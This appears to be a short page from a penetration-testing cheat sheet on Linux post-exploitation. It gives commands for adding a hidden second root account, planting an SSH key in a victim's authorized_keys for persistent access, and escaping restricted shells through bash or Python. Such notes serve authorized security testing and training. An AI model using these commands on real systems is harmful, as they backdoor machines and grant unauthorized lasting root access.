In this section, you will find several useful commands for the Post-Exploitation phase in Linux systems.


Creating a user

sudo useradd [-m] <USERNAME>

Add a user to a group

sudo usermod -aG <GROUP> <USERNAME>

Create an alternative root user

useradd -m -ou 0 -g 0 -p <ENCRYPTED_PASSWORD> -s /bin/bash <USERNAME>

Login through SSH

There are times when we have a remote terminal as a user but we want to have access as that user via SSH although we do not know their password. SSH keys are used for these cases.
  1. 1.
    Generate a SSH key pair.
kali@kali:~$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/
  1. 1.
    Add the public key to the victim's file ~/.ssh/authorized_keys:
echo -e "\n<PUB_KEY>\n" >> ~/.ssh/authorized_keys
  1. 1.
    Log in.
ssh -i ~/.ssh/id_rsa <USERNAME>@<IP>

Shell Escapes

It could be the case that you have obtained access to a restricted shell allowing you to perform a minimal amount of commands and preventing you from accessing other directories or files.
In this section, you will find some ways to escape those restricted shells.


ssh <USERNAME>@<TARGET_I -t "bash --noprofile -i"

Python Jail

echo os.system('/bin/bash')
For more examples of how to escape restricted shells, read the following articles.
Last modified 1yr ago